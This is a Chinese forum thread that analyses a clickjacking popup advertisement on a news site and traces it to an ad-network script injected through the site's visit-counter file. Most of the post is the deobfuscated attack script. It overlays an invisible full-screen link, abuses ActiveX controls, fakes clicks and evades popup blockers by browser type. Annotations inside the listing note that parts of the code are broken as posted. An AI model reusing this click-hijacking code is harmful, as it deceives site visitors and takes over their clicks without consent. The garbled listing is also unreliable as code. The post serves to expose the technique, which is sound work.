国内也有牛人啊。很有用的。
天星网ClickJacking点击劫持分析http://www.21tx.com/ 天星网
我得联系联系作者
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
http://www.lxting.com/script/popup/v1_min.js
这个是锁定到的JS脚本:
解密后的代码:
(function() {
// Shared state for the popup script; every helper below closes over these names.
// Destination URL, taken from the global ytpp_url that the including page is expected to define.
var aa_url = window.ytpp_url;
var ua = navigator.userAgent;
// Hidden container that form_pop() fills and inserts; other helpers look it up by its id.
var form_div = document.createElement('div');
// Set to 1 by form_pop()'s keyup fallback; a_pop()'s timer removes its overlay once it sees 1.
var form_pd = 0;
// Browser flags derived from User-Agent regexes only (plus the window.chrome object for `gg`).
// pop() chooses its window-opening helper from these flags, so a different UA string
// changes which code path a sandbox or analyst will observe.
var browser = {
ie: /msie/i.test(ua),
ie6: /msie 6/i.test(ua),
ie7: /msie 7/i.test(ua),
ie8: /msie 8/i.test(ua),
ie9: /msie 9/i.test(ua),
360 : /360se/i.test(ua),
sogou: /;?se.+?MetaSr/i.test(ua),
maxthon: /Maxthon/i.test(ua),
tt: /TencentTraveler/i.test(ua),
ff: /firefox/i.test(ua),
webkit: /AppleWebKit/i.test(ua),
opera: /Opera/i.test(ua),
qqbrowser: /QQBrowser/i.test(ua),
cr: /chrome/i.test(ua),
gg: window.chrome,
theworld: /Theworld/i.test(ua)
};
// Raw settings string (init() copies it from the global ytpp_sti) and the knobs parsed out of it.
var _setting = "";
// "CT": cookie lifetime handed to p(); its sign selects the cookie name in fstart().
var _ct = 0;
// "LE": start delay in seconds (fstart() multiplies it by 1000).
var _le = 0;
// Default-on switch: go() schedules pop() when this is 1. init() never reads a "PD" key; it only zeroes this.
var _pd = 1;
// "PD2": compared with Math.random() in go() before scheduling a second pop().
var _pd2 = 0;
// Only ever reset to 0 in init(); not read anywhere else in this listing.
var _pc = 1;
// "PC2": compared with Math.random() in go() before calling a_pop().
var _pc2 = 1;
// "PCO": when 1 (and POO is not 1), go() calls only a_pop().
var _pco = 0;
// "PT".."PT10" slots: go() uses the ...a value as a delay in seconds and compares the ...b value with Math.random().
var _pta = 0;
var _ptb = 0;
var _pt2a = 0;
var _pt2b = 0;
var _pt3a = 0;
var _pt3b = 0;
var _pt4a = 0;
var _pt4b = 0;
var _pt5a = 0;
var _pt5b = 0;
var _pt6a = 0;
var _pt6b = 0;
var _pt7a = 0;
var _pt7b = 0;
var _pt8a = 0;
var _pt8b = 0;
var _pt9a = 0;
var _pt9b = 0;
var _pt10a = 0;
var _pt10b = 0;
// "PO": compared with Math.random() in go() before calling func() directly.
var _po = 0;
// "POO": when 1, go() calls only func().
var _poo = 0;
// Frequency-cap cookie name and lifetime; both are assigned in fstart().
var ckn, ckt;
// Number of popups counted so far; restored from the cookie in fstart() and written back through p().
var ads = 0;
/**
 * Read a cookie value by name from document.cookie.
 *
 * The lookup is a plain substring search for `name=`, so it also matches a
 * cookie whose name merely ends with `w`. The value is passed through
 * unescape() before it is returned.
 *
 * @param {string} w - cookie name to look for
 * @returns {string} the decoded value, or "" when there is no match
 */
function b(w) {
  var jar = document.cookie;
  var key = w + "=";
  if (jar.length === 0) {
    return "";
  }
  var start = jar.indexOf(key);
  if (start === -1) {
    return "";
  }
  start += key.length;
  var end = jar.indexOf(";", start);
  if (end === -1) {
    end = jar.length;
  }
  return unescape(jar.substring(start, end));
}
/**
 * Write a cookie for path "/" that expires a given number of minutes from now.
 *
 * @param {string} w - cookie name
 * @param {*} p - lifetime in minutes; anything parseFloat() cannot read falls back to 30
 * @param {*} v - cookie value, concatenated as-is (no escaping is applied)
 */
function p(w, p, v) {
  var minutes;
  try {
    minutes = parseFloat(p) * 1;
  } catch (err) {
    minutes = 30;
  }
  if (isNaN(minutes)) {
    minutes = 30;
  }
  var expiresAt = new Date(new Date().getTime() + minutes * 60 * 1000);
  var pair = w + '=' + v;
  document.cookie = pair + ';expires=' + expiresAt.toGMTString() + ';path=/;';
}
/**
 * Parse the settings string into the shared knobs.
 *
 * Copies the global ytpp_sti (a "KEY:value;" list) into _setting, then uses
 * getp() to pick out CT, LE, PD2, PC2, PCO, PT..PT10, PO and POO when they are
 * present. Values are stored as the strings getp() returns.
 */
function init() {
_setting = ytpp_sti;
if (getp(_setting, "CT")) {
_ct = getp(_setting, "CT")
}
if (getp(_setting, "LE")) {
_le = getp(_setting, "LE")
}
if (getp(_setting, "PD2")) {
_pd2 = getp(_setting, "PD2")
}
if (getp(_setting, "PC2")) {
_pc2 = getp(_setting, "PC2")
}
if (getp(_setting, "PCO")) {
_pco = getp(_setting, "PCO")
}
for (var i = 1; i <= 10; i++) {
// Slot 1 has no numeric suffix ("PT"); slots 2..10 are "PT2".."PT10".
var n = i == 1 ? "": i;
if (getp(_setting, "PT" + n)) {
// eval() is used only to build the variable names _ptN / _ptNa / _ptNb. The evaluated
// strings are assembled from the loop counter; the setting value is fetched by the
// getp() call inside the evaluated code and is not spliced into the string.
// NOTE(review): as posted, both _ptNa and _ptNb receive the whole split array and no
// element index is applied; go() later compares _ptNb with Math.random(). Element
// indexes may have been lost when the listing was posted - confirm against the original file.
eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
eval("_pt" + n + "a = _pt" + n + ";");
eval("_pt" + n + "b = _pt" + n + ";")
}
}
if (getp(_setting, "PO")) {
_po = getp(_setting, "PO")
}
if (getp(_setting, "POO")) {
_poo = getp(_setting, "POO")
}
// Exclusive modes: POO takes precedence over PCO, and every other knob is zeroed
// so go() runs exactly one behaviour.
if (_pco == 1 || _poo == 1) {
if (_poo == 1) {
_pco = 0
} else {
_poo = 0
}
_pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
for (var i = 2; i <= 10; i++) {
eval("_pt" + i + "a = _pt" + i + "b = 0;")
}
}
};
/**
 * Extract one value from a "KEY:value;KEY:value;" settings string.
 *
 * The key is located with a plain substring search for `p + ":"`, so a key
 * that is a suffix of another key can match the longer one first.
 *
 * @param {string} s - settings string
 * @param {string} p - key to look up
 * @returns {string|undefined} the text between "KEY:" and the next ";",
 *   "" when no ";" follows the key, or undefined when the key is absent
 */
function getp(s, p) {
  var at = s.indexOf(p + ":");
  if (at < 0) {
    return;
  }
  var valueStart = at + p.length + 1;
  var semi = s.indexOf(";", at);
  // Distance from the key to the terminating ";" (-1 when there is none).
  var span = semi === -1 ? -1 : semi - at;
  return s.substr(valueStart, span - p.length - 1);
}
/**
 * Event-binding shim: IE-flagged browsers get an 'on'-prefixed event name,
 * all others get (event, func, false).
 *
 * NOTE(review): as posted, the first argument `e` is invoked directly as a
 * function, yet every caller in this listing passes a DOM object (document,
 * window, an <a> element). A member name after `e` appears to be missing from
 * the listing, so these calls would throw as written. `act` is never read, so
 * callers that pass `true` as a fourth argument get the same binding behaviour.
 */
function event(e, event, func, act) {
if (browser.ie) e('on' + event, func);
else e(event, func, false)
}
/**
 * Dispatcher: pick a window-opening helper according to the UA flags in `browser`.
 *
 * Waits for document.body (retrying every 13 ms), then runs one branch. Each
 * branch tries a helper and, on a falsy return or an exception, falls back to
 * click_pop() or a_pop(), both of which wait for a real user mouse action.
 * `param` is only forwarded to the retry call; no helper receives it from here.
 */
function pop(url, param) {
if (!document.body) {
return setTimeout(function() {
pop(url, param)
},
13)
}
try {
// Chrome UA together with a truthy window.chrome object.
if (browser['cr'] && browser['gg']) {
try {
hrefopen(url)
} catch(e) {
a_pop(url)
}
} else if (browser['webkit'] && browser['maxthon']) {
if (!func(url)) {
try {
form_pop(url);
a_pop(url)
} catch(e) {}
}
} else if (browser['tt']) {
try {
object_pop(url)
} catch(e) {
a_pop(url)
}
} else if (browser['sogou']) {
if (!func(url)) {
try {
a_pop(url)
} catch(e) {}
}
} else if (browser['webkit'] && browser['qqbrowser']) {
if (!func(url)) {
try {
form_pop(url)
} catch(e) {
click_pop(url)
}
}
} else if (browser['webkit'] || browser['opera']) {
try {
form_pop(url);
a_pop(url)
} catch(e) {}
} else if (browser['theworld'] && browser.ie6) {
// object_pop2() has no return statement, so unless it throws this always continues to a_pop().
if (!object_pop2(url)) {
a_pop(url)
}
} else if (browser['theworld'] && browser.ie8) {
if (!func(url)) {
try {
object_pop(url)
} catch(e) {
click_pop(url)
}
}
} else if (browser.ie6) {
if (!func(url)) {
object_pop2(url)
}
} else if (browser.ie8) {
if (!func(url)) {
try {
object_pop(url)
} catch(e) {
// One-shot handler: the next click anywhere in the document calls func(url), then unhooks itself.
document.onclick = function() {
func(url);
document.onclick = null
}
}
}
} else if (browser['ie']) {
try {
object_pop(url)
} catch(e) {
click_pop(url)
}
} else if (browser['ff']) {
if (!func(url)) {
click_pop(url)
}
} else {
if (!func(url)) {
click_pop(url)
}
}
} catch(e) {
// Anything that escaped a branch (for example func() throwing) ends up on a user-action fallback.
if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
click_pop(url)
} else {
a_pop(url)
}
}
}
/**
 * Insert a 1x1 px <object> with a fixed classid and call its launchURL(url) method,
 * then bump the popup counter and persist it through p().
 *
 * NOTE(review): this CLSID is commonly documented as the Windows Media Player
 * ActiveX control - confirm before relying on it in a detection rule.
 * `param` is never read.
 */
function object_pop(url, param) {
var object = document.createElement('object');
object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
append(object);
object.launchURL(url);
// Counted whether or not a window actually appeared; launchURL's result is not checked.
ads++;
p(ckn, ckt, ads)
}
/**
 * Insert a 1x1 px <object> with a second fixed classid and, 500 ms later, call
 * DOM.Script.open(url, '_blank', '') on it.
 *
 * Has no return statement, so callers that test its result always see a falsy value.
 * NOTE(review): this CLSID is commonly documented as the "safe for scripting"
 * DHTML Editing ActiveX control - confirm. `param` is never read.
 */
function object_pop2(url, param) {
var object2 = document.createElement('object');
object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
append(object2);
// Enumerates the object's properties and calls an empty function each time; nothing is stored.
for (var i in object2) {
try { (function(o) {})(object2)
} catch(e) {}
}
setTimeout(function() {
object2.DOM.Script.open(url, '_blank', '')
},
500);
// The counter and cookie are updated immediately, before the delayed open has run.
ads++;
p(ckn, ckt, ads)
}
/**
 * Insert element `e` at the top of <body>.
 *
 * The outer loop runs once, for the single key "body".
 * NOTE(review): as posted, insertBefore/firstChild are used on the collection
 * returned by getElementsByTagName rather than on one of its elements, which
 * would throw when a <body> exists. An index on `ele` appears to have been
 * lost from the listing - confirm against the original file.
 */
function append(e) {
for (var t in {
body: 1
}) {
var ele = document.getElementsByTagName(t);
for (var i = 0; i < ele.length; i++) {
ele.insertBefore(e, ele.firstChild);
// Only the first match is used.
return
}
}
}
/**
 * Build a hidden <a target="_blank"> that is never attached to the document and
 * dispatch a synthetic "click" MouseEvent on it (the event is created with the
 * ctrlKey argument set to true), then bump and persist the popup counter.
 *
 * @returns {boolean} true when no exception was thrown, false otherwise. The
 *   result says nothing about whether a window actually opened.
 */
function hrefopen(url) {
try {
var c = document.createElement("a");
c.setAttribute("href", url);
c.setAttribute("target", "_blank");
c.setAttribute("style", "display:none;");
var b = document.createEvent("MouseEvents");
b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
c.dispatchEvent(b);
ads++;
p(ckn, ckt, ads);
return true
} catch(q) {
return false
}
}
/**
 * Build a hidden POST form with target "_blank" and submit it by clicking a hidden submit button.
 *
 * The form's action is the shared aa_url; the `url` argument is not used.
 * Fixed DOM identifiers created here (usable as page-inspection indicators):
 * container id "__unionsky_push_d_object_box__", form name
 * "__unionsky_push_d_form_box__", submit button id "_sumit_2app".
 * This helper does not touch the popup counter.
 */
function form_pop(url) {
form_div.setAttribute('id', '__unionsky_push_d_object_box__');
form_div.setAttribute('style', 'display:none');
var form = document.createElement('form');
form.setAttribute('action', aa_url);
form.setAttribute('method', 'post');
form.setAttribute('name', '__unionsky_push_d_form_box__');
form.setAttribute('target', '_blank');
form.setAttribute('style', 'display:none');
var sinput = document.createElement('input');
sinput.setAttribute('style', 'display:none');
sinput.setAttribute('type', 'submit');
sinput.setAttribute('id', '_sumit_2app');
form.appendChild(sinput);
form_div.appendChild(form);
append(form_div);
var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
try {
document.getElementById("_sumit_2app").click()
} catch(e) {
// Fallback: wait for the next keyup anywhere in the document and submit the form from that handler.
event(document, 'keyup',
function(e) {
// Do nothing if the container has already been removed (a_pop's click handler removes it).
if (document.getElementById('__unionsky_push_d_object_box__') == null) {
return
};
e = e || window.event;
// "canceBubble" is spelled this way in the listing; it sets an ad-hoc property, not cancelBubble.
e.canceBubble = true;
// Goes through the same event() shim again with a fourth argument that the shim ignores.
event(document, 'keyup', arguments.callee, true);
// Tells a_pop()'s timer to remove its overlay.
form_pd = 1;
unionsky_from.submit()
})
}
};
/**
 * Defer the popup to the user's next mouseup anywhere in the document: the
 * handler calls func(url, param) from inside that user-initiated event.
 *
 * The counter is incremented here in addition to the increment func() performs
 * when it returns a truthy window, so one successful open is counted twice.
 */
function click_pop(url, param) {
event(document, 'mouseup',
function(e) {
e = e || window.event;
// "canceBubble" is spelled this way in the listing; it sets an ad-hoc property, not cancelBubble.
e.canceBubble = true;
// Goes through the same event() shim again with a fourth argument that the shim ignores.
event(document, 'mouseup', arguments.callee, true);
func(url, param);
ads++;
p(ckn, ckt, ads)
})
};
/**
 * Click-hijacking overlay: insert an invisible <a target="_blank" href=url>
 * that covers the viewport so the user's next click lands on it.
 *
 * What a defender can look for in the live DOM: an <a> that is the first child
 * of <body>, positioned absolute at 0,0 with opacity 0, cursor "default" and
 * z-index 2147483647, wrapping a white <div> sized to the viewport.
 * The overlay is skipped entirely when the global ytpp_plid equals 166028.
 */
function a_pop(url) {
if (ytpp_plid == 166028) {
return
}
// Retry every 13 ms until <body> exists.
if (!document.body) {
return setTimeout(function() {
a_pop(url)
},
13)
}
var a = document.createElement("a");
a.href = url;
a.target = "_blank";
var div = document.createElement('div');
div.style.backgroundColor = '#fff';
a.appendChild(div);
append(a);
var as = a.style;
as.position = "absolute";
// Largest 32-bit signed value, so the link sits above ordinary page content.
as.zIndex = '2147483647';
as.display = "block";
as.top = "0px";
as.left = "0px";
// Keeps the normal arrow cursor, so hovering does not reveal that a link is under the pointer.
as.cursor = 'default';
// Fully transparent in standards browsers (opacity) and old IE (filter).
as.opacity = "0";
as.filter = "alpha(opacity:0)";
// Every 120 ms: keep the overlay on top, follow the scroll position and match the viewport size.
var m = setInterval(function() {
// form_pop()'s keyup fallback already fired, so the overlay is no longer needed.
if (form_pd == 1) {
a.parentNode.removeChild(a);
clearInterval(m);
return
}
a.style.zIndex = '2147483647';
var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
div.style.height = d.clientHeight + 'px';
if (browser['ie']) {
try {
// Intent appears to be lowering any sibling that also uses the maximum z-index.
// NOTE(review): as posted, `divs` (the childNodes list) is used without an index, so
// divs['style'] is undefined and every iteration hits `continue`. The index appears
// to have been lost from the listing - confirm against the original file.
var divs = document.body.childNodes;
for (var i = 0; i < divs.length; i++) {
if (!divs['style']) {
continue
}
var _i = parseInt(divs.style.zIndex);
if (_i && divs != a && _i == 2147483647) {
divs.style.zIndex = _i - 1
}
}
a.style.zIndex = '2147483647'
} catch(e) {}
}
},
120);
// The hijacked click: the browser follows the link natively, this handler only cleans up and counts.
a.onclick = function(e) {
if (document.getElementById('__unionsky_push_d_object_box__') != null) {
form_div.parentNode.removeChild(form_div)
}
e = e || window.event;
e.cancelBubble = true;
// Removal is delayed by 200 ms.
setTimeout(function() {
a.parentNode.removeChild(a)
},
200);
clearInterval(m);
ads++;
p(ckn, ckt, ads)
};
// Marks mouseup on the overlay as not bubbling (cancelBubble).
event(a, 'mouseup',
function(e) {
e = e || window.event;
e.cancelBubble = true
})
}
/**
 * Direct opener: requests a new "_blank" window sized to the full screen with
 * all browser chrome enabled, and counts the popup when a truthy handle comes back.
 *
 * NOTE(review): as posted, `f` is the window object itself and is then called
 * as a function, which would throw. The arguments have the shape of a
 * window-opening call, so a member name appears to have been lost from the
 * listing - confirm against the original file. `param` is never read.
 *
 * @returns the value returned by the call (callers treat a falsy value as "blocked")
 */
function func(url, param) {
var f = window;
var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
if (w) {
ads++;
p(ckn, ckt, ads)
};
return w
}
/**
 * Entry point: load settings, apply the cookie-based frequency cap, then start go().
 *
 * The cap is the reason the popup stops after it has fired and comes back once
 * cookies are cleared: the counter lives in the "YITIAN_NUM" or "YITIAN_ALL" cookie.
 */
function fstart(url) {
init();
// CT >= 0 selects the "YITIAN_NUM" cookie, CT < 0 the "YITIAN_ALL" cookie; |CT| is the lifetime given to p().
if (_ct >= 0) {
ckn = "YITIAN_NUM";
ckt = _ct
} else {
ckn = "YITIAN_ALL";
ckt = Math.abs(_ct)
}
// Restore the running count from the cookie, if one is set.
if (ckt > 0) {
if (b(ckn)) {
try {
ads = parseFloat(b(ckn))
} catch(q) {}
}
}
// Stop when anything has been counted under "YITIAN_ALL", or when the count has reached the global ytpp_ads.
if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
return
} else {
if (_le > 0) {
// As written, go(url) runs immediately and its return value (undefined) is what
// setTimeout receives, so the LE delay does not postpone anything.
setTimeout(go(url), _le * 1000)
} else {
go(url)
}
}
}
/**
 * Run the configured popup behaviours for `url`.
 *
 * POO == 1: only the direct opener func(). PCO == 1: only the click overlay
 * a_pop(). Otherwise each knob is checked independently, so several popups can
 * be scheduled in one call. Knob values are strings from the settings; the `>`
 * comparisons with Math.random() coerce them to numbers.
 */
function go(url) {
if (_poo == 1) {
try {
func(url)
} catch(q) {}
} else if (_pco == 1) {
a_pop(url)
} else {
// Default path: one pop() 300 ms after start.
if (_pd == 1) {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
}
// Optional second pop(), taken when PD2 exceeds a random number in [0, 1).
if (_pd2 > Math.random()) {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
}
// Timed slots PT..PT10: when _ptNb exceeds a random number, schedule pop() after
// _ptNa seconds plus 300 ms. eval() only resolves the variable name built from the
// loop counter; the delay expression is evaluated now, not inside the callback.
for (var i = 1; i <= 10; i++) {
var n = i == 1 ? "": i;
if (eval("_pt" + n + "b") > Math.random()) {
setTimeout(function() {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
},
parseInt(eval("_pt" + n + "a")) * 1000)
}
}
// Click overlay, taken when PC2 exceeds a random number.
if (_pc2 > Math.random()) {
a_pop(url)
}
// Direct opener, taken when PO exceeds a random number; exceptions are swallowed.
if (_po > Math.random()) {
try {
func(url)
} catch(q) {}
}
}
};
// Start immediately when the script is evaluated, using the URL taken from the global ytpp_url.
fstart(aa_url);
// Registers an empty beforeunload handler through the event() shim; the handler body does nothing.
event(window, 'beforeunload',
function() {})
})();
通过浏览器抓包
URL从这里产生
http://play.unionsky.cn/show/?placeid=141830
直接打开看不到什么东西
http://www.unionsky.cn/ 是属于这个广告联盟的
我们直接分析抓包的内容
// Response body captured for the placement URL; it defines the ytpp_* globals and then pulls in two more scripts.
// Referrer, URI-encoded twice and capped at 1000 characters.
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r;
// Client details appended to every request below: User-Agent, screen size, browser language.
var ytpp_u = encodeURIComponent(navigator.userAgent);
var ytpp_s = window.screen.width + "*" + window.screen.height;
var ytpp_l = navigator.browserLanguage || navigator.language;
// Same number as the placeid in the URL this response was fetched from.
var ytpp_plid = 141830;
// Not used in the lines shown here.
var ytpp_w = 0;
var ytpp_h = 0;
// Jump URL: an opaque `p` token plus the client details and a random cache-buster.
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random();
var ytpp_ads = 14;
// "KEY:value;" list of behaviour settings.
var ytpp_sti = 'CT:-3;PD:1;PC:1;PC2:1;PT:60,1;PT2:100,1;';
// Both scripts are written into the page with document.write and fetched over plain http,
// so they run with the embedding page's privileges and nothing checks their integrity.
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。
继续分析 发现这里
http://txsite.21tx.com/count/count.js
// Visit counter script. It collects screen metrics, builds a counting URL and then
// writes three <script> tags into the page. The names below are assigned without
// a declaration, so they become globals.
txcount_uid = 1;
txcount_uh = 0;
txcount_uw = 0;
txcount_uah = 0;
txcount_uaw = 0;
txcount_ucd = 0;
if (window.screen) {
txcount_uh = window.screen.height;
txcount_uw = window.screen.width;
txcount_uah = window.screen.availHeight;
txcount_uaw = window.screen.availWidth;
txcount_ucd = window.screen.colorDepth;
}
var url = "http://txsite.21tx.com/count/count.aspx";
url = url + "?u="+ txcount_uid;
//url = url + "&f=" + txcount_f;
// txsite_pagekey is not defined in this script; it must already exist as a global on the page.
url = url + "&k=" + txsite_pagekey;
//url = url + "&t=" + txcount_t;
// Current page address and referrer are sent along, passed through escape().
url = url + "&l=" + escape(document.location);
url = url + "&r=" + escape(document.referrer);
url = url + "&uh=" + txcount_uh;
url = url + "&uw=" + txcount_uw;
url = url + "&uah=" + txcount_uah;
url = url + "&uaw=" + txcount_uaw;
url = url + "&ucd=" + txcount_ucd;
// The src attribute is written without quotes.
document.write("<script src=" + url + "><\/script>");
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>');
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>');
// This line is how the ad-network code reaches the page: the counter script itself injects
// a third-party script over plain http, and that script runs with the page's privileges.
// Pages that include count.js inherit whatever this URL serves.
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
一切昭然天下了。
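代码产生的直接效果如下:页面最上层被插入一个铺满可视区域、完全透明(opacity: 0)、z-index 取最大值 2147483647 的 <a target="_blank"> 链接,用户的第一次点击实际落在这个链接上,所以新窗口是由用户的真实点击打开的,而不是脚本直接弹出的。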
<a target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>
很隐秘的一段好代码
标记一下 好象看不懂还:dizzy: 不清楚国内,莫非做taobao不可以直接用弹窗吗? 没用 360 搜狗 直接就拦截了,chrome可以弹出来 adblock 完美屏蔽:lol 没研究全,期待更多解析。 代码看不懂,不过觉得挺好用的……自动弹窗 没懂
1,首次访问有个弹窗,但是被chrome给拦截了
2,劫持了第一次点击
3,CS了一下unionsky
然后? cissss 发表于 2013-12-18 01:24
没懂
1,首次访问有个弹窗,但是被chrome给拦截了
懂的人一看就懂 不懂的人怎么看就不懂 这个CJ怎么搞的这么复杂... 小狠 发表于 2013-12-18 03:49
懂的人一看就懂 不懂的人怎么看就不懂
我确实不懂你发这贴的意思。 可以理解为装逼么? 不就是个弹窗代码吗?:o:o :(:(我表示看不懂 占位,慢慢领会啥意思:lol